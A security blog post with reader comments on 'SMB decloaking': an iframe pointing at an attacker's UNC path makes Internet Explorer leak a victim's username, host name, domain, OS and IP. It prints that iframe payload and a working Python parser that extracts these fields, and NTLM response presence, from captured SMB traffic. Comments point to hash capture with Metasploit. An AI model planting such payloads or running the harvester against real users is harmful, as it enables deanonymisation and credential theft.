web application security lab

SMB Decloaking

Still in line with the DefCon preso, next on the list of things I need to talk about is SMB. Yeah, I already talked about SMBenum, but that's different - that was about knowing what you've got on your drive. SMB itself is just a way for two computers to talk to one another, and the simplest way to make a browser start that conversation is an iframe pointing at a UNC path. Of course SMB has to be running on both sides and the two machines need to be able to reach each other for this to work. But the nice thing is that if you've got Wireshark running on the receiving end you can pull the victim's real username, IP address, computer name, OS version/service pack and possibly other interesting tidbits straight off the wire.

<iframe src="file:///\\123.123.123.123/"></iframe>

Of course, for this to work several things have to be true. One, the IP address above needs to be replaced with the attacker's machine. Two, the attacker needs to be running an SMB service on that machine to accept the connection and capture the information. Three, the network the victim is connecting from must allow outbound SMB (TCP 445, or 139 for NetBIOS session traffic), which I'm told is only about 50% of companies. So roughly half of users, out of the 60% or so running an IE variant, are exposed. That's still not a bad hit rate, it isn't particularly noisy to the user either, and it requires no user interaction, which is nice.
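To see what actually crosses the wire when the iframe above fires, here is a small passive parser, added as an example for this page (it is not RSnake's code, nor Wireshark's or Metasploit's): it finds the NTLMSSP blob inside an SMB session-setup payload and pulls out the fields you would otherwise read off the Wireshark dissector. The sample message it parses is constructed in the code; the names CORP, jsmith and JSMITH-PC are made up, not captured.

```python
"""Passive NTLMSSP parser for the SMB traffic a file://\\attacker\ iframe provokes.
Added example, not code from the original post or from Wireshark/Metasploit;
the sample message built at the bottom is constructed, not captured."""
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE, CHALLENGE, AUTHENTICATE = 1, 2, 3

# NegotiateFlags bits (MS-NLMP 2.2.2.5)
FLAG_UNICODE = 0x00000001
FLAG_OEM_DOMAIN_SUPPLIED = 0x00001000
FLAG_OEM_WORKSTATION_SUPPLIED = 0x00002000
FLAG_NEGOTIATE_VERSION = 0x02000000


def _field(blob, off):
    """Resolve an 8-byte (Len, MaxLen, Offset) descriptor to the bytes it references."""
    length, _maxlen, offset = struct.unpack_from("<HHI", blob, off)
    if offset + length > len(blob):
        raise ValueError("field descriptor points past end of message")
    return blob[offset:offset + length]


def _text(raw, flags):
    """Type 3 strings are UTF-16LE when NTLMSSP_NEGOTIATE_UNICODE is set, else OEM (approximated as latin-1)."""
    return raw.decode("utf-16-le" if flags & FLAG_UNICODE else "latin-1")


def _version(blob, off):
    """Decode the VERSION structure to (major, minor, build); e.g. (6, 1, 7601) is Windows 7 SP1."""
    return struct.unpack_from("<BBH", blob, off)


def find_ntlmssp(payload):
    """Locate the NTLMSSP blob inside a raw SMB/SPNEGO payload by its signature; None if absent."""
    i = payload.find(NTLMSSP_SIGNATURE)
    return None if i < 0 else payload[i:]


def parse_ntlmssp(blob):
    """Extract the identifying fields from a client-sent NEGOTIATE (type 1) or AUTHENTICATE (type 3)."""
    if blob is None or len(blob) < 12 or not blob.startswith(NTLMSSP_SIGNATURE):
        raise ValueError("not an NTLMSSP message")
    msg_type = struct.unpack_from("<I", blob, 8)[0]
    info = {"type": msg_type}
    if msg_type == NEGOTIATE:
        flags = struct.unpack_from("<I", blob, 12)[0]
        # Type 1 domain/workstation are always OEM strings and only present if the flag says so.
        if flags & FLAG_OEM_DOMAIN_SUPPLIED:
            info["domain"] = _field(blob, 16).decode("latin-1")
        if flags & FLAG_OEM_WORKSTATION_SUPPLIED:
            info["workstation"] = _field(blob, 24).decode("latin-1")
        if flags & FLAG_NEGOTIATE_VERSION:
            info["os_version"] = _version(blob, 32)
    elif msg_type == AUTHENTICATE:
        flags = struct.unpack_from("<I", blob, 60)[0]
        info["domain"] = _text(_field(blob, 28), flags)
        info["user"] = _text(_field(blob, 36), flags)       # empty string => anonymous/null session
        info["workstation"] = _text(_field(blob, 44), flags)
        info["nt_response_len"] = len(_field(blob, 20))     # >0 means an NTLM response came along too
        if flags & FLAG_NEGOTIATE_VERSION:
            info["os_version"] = _version(blob, 64)
    # Type 2 (CHALLENGE) is the server's own message and says nothing about the victim.
    return info


def build_authenticate(domain, user, workstation, nt_response=b"", version=(6, 1, 7601)):
    """Build a minimal AUTHENTICATE message for testing (constructed data, not a capture)."""
    flags = FLAG_UNICODE | FLAG_NEGOTIATE_VERSION
    header_len = 72                       # fixed part including Version, no MIC
    payload = bytearray()

    def desc(data):
        offset = header_len + len(payload)
        payload.extend(data)
        return struct.pack("<HHI", len(data), len(data), offset)

    msg = NTLMSSP_SIGNATURE + struct.pack("<I", AUTHENTICATE)
    msg += desc(b"\x00" * 24)                        # LM response (dummy)
    msg += desc(nt_response)
    msg += desc(domain.encode("utf-16-le"))
    msg += desc(user.encode("utf-16-le"))
    msg += desc(workstation.encode("utf-16-le"))
    msg += desc(b"")                                 # encrypted session key (absent)
    msg += struct.pack("<I", flags)
    msg += struct.pack("<BBH3BB", version[0], version[1], version[2], 0, 0, 0, 15)
    assert len(msg) == header_len
    return bytes(msg) + bytes(payload)


def demo():
    """Constructed: a Windows 7 SP1 box JSMITH-PC in domain CORP, logged in as jsmith (made-up names)."""
    blob = build_authenticate("CORP", "jsmith", "JSMITH-PC", nt_response=b"\x11" * 24)
    # Wrap it in fake NetBIOS + SMB header bytes to show the signature search skipping the framing.
    framed = b"\x00\x00\x00\x00" + b"\xffSMB" + b"\x00" * 60 + blob
    return parse_ntlmssp(find_ntlmssp(framed))
```

Feed `find_ntlmssp` the reassembled TCP payload of the victim's Session Setup request (from a pcap or a raw listener on 445) and `parse_ntlmssp` gives you the domain, username, workstation name and OS build in one dict; an empty `user` means the browser only opened a null session, and a non-zero `nt_response_len` means the hash HD Moore mentions below was sent as well.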

10 Responses to “SMB Decloaking”

  1. Rosario Valotta Says:

    Hi, the same SMB issues can also be exploited using Windows Media Player embedded in a web page. Used against a victim in an intranet environment, it can allow the attacker to scan the hosts reachable from the victim with an exact identification of hostname, domain, OS, CPU model, etc.
    I posted about this topic on my blog a couple of months ago.

  2. Sir Duke Says:

    Dude, what kind of a noob are you? This stuff has been talked about for years. See e.g. http://blog.metasploit.com/2008_11_01_archive.html; http://www.xfocus.net/articles/200305/smbrelay.html. You make it sound like you just discovered this. At least give credit where it’s due.

  3. sencaw Says:

    Tried to locate that, Rosario, and could not; could you hit me with the link please?

    on topic

    Good post. Q: any IE? Q: how particularly NOT noisy?

    thx

  4. RSnake Says:

    @Sir Duke - I think you mis-read my post. This isn’t about authentication tokens/NTLM challenge responses or anything like that. This is about the fact that it discloses the username and computer name in an _unauthenticated_ state. Nothing to do with passwords.

    And no, I probably didn’t invent it. Seems like anything anyone says has some foundation in other people’s research. No need to be hostile.

  5. RSnake Says:

    @sencaw - yeah all versions of IE appear to work. It’s not noisy in the sense where there’s no popups or anything to alert the user. From a network perspective it’s very noisy, but not that many people are watching the wire during typical web surfing activities.

  6. Rosario Valotta Says:

    @sencaw the link is http://sites.google.com/site/tentacoloviola

  7. Bob Says:

    You didn’t by chance grab this from deanonymizer.com’s IE 0-day scan that launched during BlackHat and Defcon this year, did you?

    Let me explain a bit more about this.
    When IE uses this FILE URI and points to a directory/share using SMB, it looks for the desktop.ini file too. Using the correct variables in the path to set the folder’s icon, an attacker can reveal the %USERNAME%, %COMPUTERNAME%, %DOMAINNAME% (or Workgroup), and the real IP address of the user *IF* they are using a shitty proxy.

    Now what makes this even more interesting is the history of SMB. Besides revealing information, SMB has been prone to several vulnerabilities in the past. WebDAV, BTW, is used when SMB can’t make it outside the network for _X_ reason. If you look hard enough, you’ll find remote code execution in WebDAV. It’s already been found, but Windows 7 has fixed the issue so it’s a dying vuln.

    Go ahead and take a closer look at WebDAV, but just remember where you got your info from. Some people don’t take it lightly when credit isn’t given when it’s due. Take Kaminsky, for example, who tried taking the part of spotlight of Moxie’s SSL work…and he ended up in the zf05. Something to think about….

  8. opreat0r Says:

    may as well pwn them if you are going to inject img src=\\UNC .. :)

    http://forums.remote-exploit.org/showthread.php?t=12885

  9. RSnake Says:

    @Bob - cool, no I hadn’t heard about the deanonymizer project. I actually first started talking about this at Blackhat, incidentally (maybe even on the same day)? Small world. But yeah, I wasn’t thinking about using it to scan, just to passively listen to the wire. I’m sure you’re right and there is a lot of other stuff out there to be found.

    Which SSL work did Kaminsky steal? I didn’t make his presentation this year, and haven’t gotten the DVDs for the conference, so I haven’t seen it. I just heard something about MD2 being used….?

    @opreat0r - true, my speech with Jabra was just about decloaking. I leave the actual exploitation to the MetaSploit browser auto-pwn guys. They live and breathe that kind of thing. Our speech was just about anti-privacy.

  10. HD Says:

    You can use metasploit’s smb_sniffer module to log all of these requests. You also get a crackable password hash.